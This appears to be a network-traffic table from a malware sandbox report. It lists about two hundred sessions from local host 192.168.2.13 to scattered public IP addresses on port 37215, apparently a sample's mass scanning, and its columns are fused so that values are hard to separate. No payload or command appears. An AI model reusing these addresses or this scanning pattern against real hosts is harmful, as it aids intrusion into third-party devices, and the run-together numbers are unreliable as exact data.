                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15431192.168.2.1349074124.206.9.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15432192.168.2.1336592157.103.150.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15433192.168.2.1352722157.230.205.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15434192.168.2.1342592157.249.31.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15435192.168.2.1342812197.153.91.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15436192.168.2.1353760197.6.243.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15437192.168.2.133784441.77.88.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15438192.168.2.1342034157.95.84.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15439192.168.2.1351260157.234.207.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15440192.168.2.1359416119.199.39.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15441192.168.2.1349770197.240.179.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15442192.168.2.1336926197.40.42.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15443192.168.2.1340290197.180.152.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15444192.168.2.1350634102.177.188.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15445192.168.2.133291641.130.66.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15446192.168.2.1340252157.224.106.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15447192.168.2.1336270157.249.65.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15448192.168.2.1346954197.65.252.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15449192.168.2.134412278.56.170.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15450192.168.2.135505841.128.77.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15451192.168.2.1351660197.189.187.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15452192.168.2.135478867.185.39.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15453192.168.2.1346008197.1.157.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15454192.168.2.1359750168.157.138.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15455192.168.2.1337848197.60.57.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15456192.168.2.1335454157.150.25.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15457192.168.2.135551841.12.101.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15458192.168.2.1352128197.119.147.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15459192.168.2.134949441.78.89.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15460192.168.2.134162841.153.103.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15461192.168.2.1335916213.183.29.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15462192.168.2.1360194172.197.51.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15463192.168.2.134596493.0.34.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15464192.168.2.134421441.41.41.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15465192.168.2.1359382183.219.182.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15466192.168.2.134961437.125.9.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15467192.168.2.135265041.121.85.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15468192.168.2.135633041.79.173.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15469192.168.2.1335306116.182.119.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15470192.168.2.1337688157.131.208.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15471192.168.2.1347654197.158.176.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15472192.168.2.1340980157.111.212.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15473192.168.2.1357226108.240.145.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15474192.168.2.135654841.162.35.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15475192.168.2.134788041.244.28.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15476192.168.2.1337974212.148.86.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15477192.168.2.135338031.115.121.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15478192.168.2.1347340197.36.72.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15479192.168.2.133354841.110.48.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15480192.168.2.1333452157.175.209.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15481192.168.2.134295041.233.228.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15482192.168.2.1358128197.137.40.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15483192.168.2.134884641.157.87.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15484192.168.2.1348530157.56.215.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15485192.168.2.134386040.33.100.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15486192.168.2.135249241.100.24.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15487192.168.2.135208441.46.227.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15488192.168.2.1360460197.41.65.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15489192.168.2.134640641.244.217.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15490192.168.2.13526461.196.80.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15491192.168.2.133674641.244.250.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15492192.168.2.1346914157.123.93.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15493192.168.2.135386241.167.150.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15494192.168.2.133722441.250.144.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15495192.168.2.135903841.86.170.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15496192.168.2.1352644197.124.202.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15497192.168.2.1351426198.57.233.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15498192.168.2.134313441.99.120.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15499192.168.2.134442241.234.118.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15500192.168.2.1355022157.112.184.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15501192.168.2.1340468197.86.183.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15502192.168.2.1343898183.122.250.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15503192.168.2.1340874157.75.23.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15504192.168.2.133699059.71.180.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15505192.168.2.133776841.212.34.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15506192.168.2.1340040157.137.114.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15507192.168.2.1349224197.186.69.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15508192.168.2.134096241.110.207.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15509192.168.2.133559042.7.35.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15510192.168.2.133738041.212.142.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15511192.168.2.1355470157.253.191.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15512192.168.2.1357194197.125.162.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15513192.168.2.13454649.167.118.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15514192.168.2.1342292157.218.73.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15515192.168.2.1336606148.99.5.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15516192.168.2.135509038.225.14.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15517192.168.2.135666641.192.100.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15518192.168.2.1340400157.132.121.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15519192.168.2.1345012157.104.171.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15520192.168.2.134143899.92.120.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15521192.168.2.134304241.40.75.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15522192.168.2.1339068197.48.172.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15523192.168.2.1356266107.175.93.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15524192.168.2.134215285.28.134.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15525192.168.2.1339268197.251.74.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15526192.168.2.1360066197.10.240.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15527192.168.2.1354694112.65.59.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15528192.168.2.1339214157.43.13.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15529192.168.2.133328441.179.61.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15530192.168.2.134730865.105.133.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15531192.168.2.135890641.214.229.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15532192.168.2.133434048.54.144.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15533192.168.2.1359028197.38.151.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15534192.168.2.134333841.121.49.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15535192.168.2.134035241.255.105.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15536192.168.2.1350438157.91.42.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15537192.168.2.135363241.22.44.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15538192.168.2.134921841.189.234.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15539192.168.2.1357970196.89.149.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15540192.168.2.133409814.50.33.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15541192.168.2.1353080197.176.16.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15542192.168.2.1346800157.207.131.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15543192.168.2.134137241.90.226.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15544192.168.2.1345366197.64.52.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15545192.168.2.135807841.225.10.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15546192.168.2.1356858157.148.234.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15547192.168.2.1357682157.145.72.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15548192.168.2.1357688183.186.54.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15549192.168.2.1356928205.23.11.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15550192.168.2.1345654197.60.199.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15551192.168.2.1359570157.181.26.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15552192.168.2.1354520197.94.234.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15553192.168.2.1341982160.244.219.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15554192.168.2.1355822157.188.9.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15555192.168.2.134503464.42.155.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15556192.168.2.135544625.56.8.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15557192.168.2.1350008197.147.197.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15558192.168.2.134330241.209.200.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15559192.168.2.1352420157.63.191.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15560192.168.2.134616041.255.169.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15561192.168.2.1350788157.161.149.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15562192.168.2.135978241.218.97.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15563192.168.2.1350416179.76.110.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15564192.168.2.135049841.78.72.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15565192.168.2.133437241.194.69.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15566192.168.2.1353428116.49.86.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15567192.168.2.133472835.145.227.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15568192.168.2.1335724197.10.72.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15569192.168.2.135959824.124.108.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15570192.168.2.13439164.248.91.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15571192.168.2.1348836197.17.178.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15572192.168.2.1354842194.178.8.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15573192.168.2.133722041.216.196.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15574192.168.2.1349084157.19.96.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15575192.168.2.1346164197.194.11.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15576192.168.2.1356498156.125.114.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15577192.168.2.1344600135.71.102.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15578192.168.2.134218041.203.9.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15579192.168.2.1334794157.35.177.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15580192.168.2.1352626191.45.122.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15581192.168.2.1334262101.108.139.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15582192.168.2.1356460197.197.144.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15583192.168.2.135378641.126.156.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15584192.168.2.1345918197.5.100.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15585192.168.2.136097036.179.190.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15586192.168.2.135100641.68.115.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15587192.168.2.1351314161.245.155.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15588192.168.2.1359684157.142.67.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15589192.168.2.133914664.97.161.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15590192.168.2.135442285.114.72.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15591192.168.2.1338134197.24.14.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15592192.168.2.135472841.235.199.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15593192.168.2.1360124157.88.40.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15594192.168.2.134133441.98.104.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15595192.168.2.1351176197.150.206.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15596192.168.2.136074841.110.73.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15597192.168.2.1343114197.28.248.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15598192.168.2.1356776135.166.143.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15599192.168.2.1356546197.232.150.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15600192.168.2.1342486157.224.66.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15601192.168.2.1334416157.10.18.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15602192.168.2.1346182157.156.56.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15603192.168.2.134101041.44.201.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15604192.168.2.133885441.85.112.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15605192.168.2.1346482197.228.14.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15606192.168.2.13388301.100.58.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15607192.168.2.13394041.119.131.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15608192.168.2.1335684206.153.178.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15609192.168.2.1355860157.22.171.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15610192.168.2.134197241.161.31.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15611192.168.2.1350912131.130.189.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15612192.168.2.135673641.65.42.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15613192.168.2.1352598157.208.169.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15614192.168.2.134537231.161.64.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15615192.168.2.1355092157.190.16.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15616192.168.2.1340538157.164.223.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15617192.168.2.133432041.55.112.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15618192.168.2.135074441.53.46.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15619192.168.2.1357698197.76.99.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15620192.168.2.1337858198.169.128.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15621192.168.2.1355192197.80.100.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15622192.168.2.136052441.9.174.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15623192.168.2.1359118180.33.93.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15624192.168.2.134186883.200.81.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15625192.168.2.1356982157.85.11.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15626192.168.2.1341688197.99.94.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15627192.168.2.135809441.66.14.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15628192.168.2.134801281.181.204.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15629192.168.2.134507841.182.120.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15630192.168.2.1348710157.55.209.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15631192.168.2.135420882.246.104.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15632192.168.2.1338024157.241.120.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15633192.168.2.1353866157.54.165.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15634192.168.2.135431273.246.234.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15635192.168.2.1342854157.149.155.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15636192.168.2.1334592197.201.84.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15637192.168.2.1355836197.38.230.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15638192.168.2.135930841.103.214.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15639192.168.2.134131699.202.26.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
